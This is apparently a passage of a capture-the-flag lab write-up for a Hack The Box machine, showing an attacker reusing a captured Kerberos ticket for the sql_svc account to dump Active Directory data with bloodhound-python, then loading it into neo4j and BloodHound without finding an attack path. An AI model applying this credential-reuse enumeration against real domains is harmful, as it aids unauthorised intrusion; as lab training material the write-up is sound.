BloodHound
Using the TGT of the sql_svc
user, dumping domain information with bloodhound
┌──(kali㉿kali)-[~/…/htb/labs/escape/bloodhound]
└─$ KRB5CCNAME=../sql_svc.ccache bloodhound-python -d SEQUEL.HTB -u sql_svc -k -no-pass -dc dc.sequel.htb --dns-tcp -ns $IP --zip -c All
info: Found AD domain: sequel.htb
info: Using TGT from cache
info: Found TGT with correct principal in ccache file.
info: Connecting to LDAP server: dc.sequel.htb
warning: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
info: Found 1 domains
info: Found 1 domains in the forest
info: Found 1 computers
info: Connecting to LDAP server: dc.sequel.htb
warning: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
info: Found 10 users
info: Found 53 groups
info: Found 0 trusts
info: Starting computer enumeration with 10 workers
info: Querying computer: dc.sequel.htb
info: Ignoring host dc.sequel.htb since its reported name does not match
info: Done in 00M 07S
info: Compressing output into 20230813071146_bloodhound.zip
Ingestion complete
this fork of the original ingestor provides a much more reliable Kerberos authentication with TGT.
┌──(kali㉿kali)-[~/…/htb/labs/escape/bloodhound]
└─$ sudo neo4j console
[sudo] password for kali:
directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /usr/share/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /usr/share/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses: /usr/share/neo4j/licenses
run: /usr/share/neo4j/run
Starting Neo4j.
┌──(kali㉿kali)-[~/…/htb/labs/escape/bloodhound]
└─$ bloodhound
Firing up neo4j and bloodhound
Upload complete
Unable to evaluate the potential attack path with bloodhound